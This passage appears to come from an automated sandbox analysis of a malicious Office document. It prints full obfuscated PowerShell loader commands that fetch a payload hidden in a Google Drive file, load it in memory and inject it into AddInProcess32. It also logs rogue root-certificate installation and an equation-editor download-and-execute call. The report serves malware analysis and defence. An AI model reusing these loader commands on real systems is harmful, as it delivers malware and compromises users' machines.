iYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_002821C8 push ebx; iretd 9_2_002821EA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_002825AD push ebx; retf 9_2_002825EA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00632218 pushfd ; iretd 10_2_00632219

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_035006DC URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_035006DC
                      Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
